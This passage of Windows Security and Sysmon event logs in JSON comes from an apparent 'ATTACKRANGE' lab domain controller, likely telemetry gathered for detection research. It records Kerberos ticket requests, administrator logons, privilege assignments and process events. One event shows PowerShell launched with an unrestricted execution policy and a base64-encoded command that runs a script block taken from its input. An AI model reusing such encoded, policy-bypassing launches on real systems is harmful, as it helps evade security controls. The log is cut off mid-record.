Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220588,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220589,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220590,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x826AF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x826af","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220591,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x826AF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x826af","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5553,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.281\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010C3260800}\r\nProcessId: 2388\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nParentProcessId: 872\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.281","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010C3260800}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","ParentProcessId":"872","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5554,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5555,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5556,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nSourceProcessId: 872\r\nSourceThreadId: 5096\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010C3260800}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ab2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f542fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0